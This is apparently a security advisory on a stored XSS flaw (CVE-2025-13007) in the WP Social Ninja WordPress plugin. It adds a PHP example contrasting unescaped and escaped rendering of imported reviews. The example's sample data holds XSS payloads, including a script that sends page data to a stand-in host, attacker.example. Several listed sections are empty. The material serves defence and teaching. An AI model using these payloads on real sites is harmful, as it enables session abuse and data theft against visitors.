Urgent Security Alert: Stored XSS Vulnerability Found in WP Social Ninja Plugin (CVE-2025-13007)

Overview

A significant security vulnerability, identified as CVE-2025-13007, has been discovered in the WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress. It is a Stored Cross-Site Scripting (XSS) flaw affecting all versions up to and including 3.20.3. Because the payload is delivered through content the plugin imports from connected social platforms, an attacker needs no account on the WordPress site itself: unauthenticated attackers can inject JavaScript that is stored and later rendered in the site's pages, potentially compromising user accounts and website security.

Technical Details

The root cause of this vulnerability is insufficient input sanitization and output escaping when the plugin handles content sourced from external platforms such as Google Business Profile and Facebook. Reviews and posts pulled from these platforms contain attacker-controllable fields (author names, review text, links), and the plugin fails to sanitize and escape them for the HTML context in which they are rendered on the WordPress site.

An attacker exploits this by placing content containing JavaScript (for example, an HTML tag with an event handler) in a review or post on a Google Business Profile or Facebook page that the target site has connected. When the plugin retrieves and displays that content, the injected script executes in the browser of any visitor who views the affected page, in the origin of the WordPress site. From there the attacker can steal data exposed to the page, redirect users, deface the site, or, if the viewer is a logged-in administrator, issue authenticated requests on that administrator's behalf.
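As an added illustration of the bug class described above (example code written for this post, not code from the WP Social Ninja plugin), the PHP below contrasts a template that concatenates imported review fields straight into HTML with a hardened version that escapes each field for its context. The `$review` array is constructed sample data standing in for what a platform API might return; the `esc_html`/`esc_attr`/`esc_url` stand-ins are simplified versions defined only so the file runs outside WordPress, where the real functions are used instead.

```php
<?php
// Added example: the vulnerable rendering pattern beside its hardened form.
// Not the plugin's own code. Runs stand-alone with the PHP CLI.

// Simplified stand-ins for the WordPress escaping functions. Inside WordPress
// the real esc_html(), esc_attr() and esc_url() are defined and used instead.
if (!function_exists('esc_html')) {
    function esc_html($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Simplified: accept only absolute http(s) URLs and HTML-escape them.
    // WordPress's esc_url() has a longer allowed-protocol list and accepts
    // relative URLs; the point here is that "javascript:" is rejected.
    function esc_url($url): string {
        $url    = trim((string) $url);
        $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
        if (!in_array($scheme, ['http', 'https'], true)) {
            return '';
        }
        return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed sample review, as an attacker might post it on the connected
// platform: a payload in the author name, one in the review body, and a
// javascript: URL in the profile link.
$review = [
    'author' => 'Alice <img src=x onerror="alert(document.domain)">',
    'text'   => 'Great service!<script>fetch("https://attacker.example/?d="+document.title)</script>',
    'url'    => 'javascript:alert(1)',
    'rating' => '5',
];

// Vulnerable pattern: imported fields dropped into HTML unescaped.
// Every field is under the reviewer's control, so each one is an injection point.
function render_review_vulnerable(array $r): string {
    return '<div class="review">'
         . '<a href="' . $r['url'] . '">' . $r['author'] . '</a>'
         . '<span class="rating">' . $r['rating'] . '</span>'
         . '<p>' . $r['text'] . '</p>'
         . '</div>';
}

// Hardened pattern: escape for the context each value lands in.
//   text node      -> esc_html()
//   attribute      -> esc_attr()
//   href           -> esc_url()  (also drops non-http(s) schemes)
//   numeric value  -> cast, so no string reaches the markup at all
function render_review_safe(array $r): string {
    return '<div class="review">'
         . '<a href="' . esc_url($r['url']) . '" title="' . esc_attr($r['author']) . '">'
         . esc_html($r['author']) . '</a>'
         . '<span class="rating">' . (int) $r['rating'] . '</span>'
         . '<p>' . esc_html($r['text']) . '</p>'
         . '</div>';
}

echo "VULNERABLE:\n", render_review_vulnerable($review), "\n\n";
echo "SAFE:\n", render_review_safe($review), "\n";
```

Running it prints the unescaped markup first (the `<img onerror>` and `<script>` land in the page as live elements) and then the escaped version, where the same payloads appear as literal text and the `javascript:` link is dropped. If a plugin genuinely needs to keep a subset of HTML from the platform (line breaks, emphasis), the right tool is an allow-list filter such as WordPress's `wp_kses()` with an explicit tag list, never a raw echo of the imported string.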

Review of the code shows the vulnerability exists within the following files:

CVSS Analysis

  • Severity: MEDIUM
  • CVSS Score: 6.1

Possible Impact

Successful exploitation of this vulnerability can have serious consequences:

  • Account Compromise: Script running in a logged-in user's browser can act as that user. WordPress sets its authentication cookies with the HttpOnly flag, so the script cannot simply read them with document.cookie, but it can still send authenticated requests (including to the REST API, using the nonce present on the page) in the victim's session. If the victim is an administrator, that is enough to create users, change settings, or install code on the site.
  • Website Defacement: Malicious scripts can modify page content for every visitor, leading to defacement and reputational damage.
  • Redirection to Malicious Sites: Visitors can be redirected to phishing websites or sites hosting malware, potentially leading to further compromise.
  • Data Theft: Any sensitive information rendered on the affected pages, or reachable from them in the victim's session, could be exfiltrated.

Mitigation and Patch Steps

The recommended course of action is to update the WP Social Ninja plugin immediately to the latest available version. Every release later than 3.20.3 contains the fix; confirm the installed version on the Plugins page (or with your deployment tooling) after updating, since a site running 3.20.3 or earlier remains exploitable.

If updating is not immediately possible, temporarily deactivate the plugin until the update can be applied; this removes the embedded feeds and reviews from the site, and with them the rendering path the exploit relies on. Also review the connected Google Business Profile and Facebook accounts for reviews or posts containing HTML or script fragments. Because the payload lives on the connected platform, removing it there (or disconnecting that source) removes it from the site as well, while the underlying escaping flaw remains until the plugin is updated.

Changes to the code can be seen in the following commits:

References
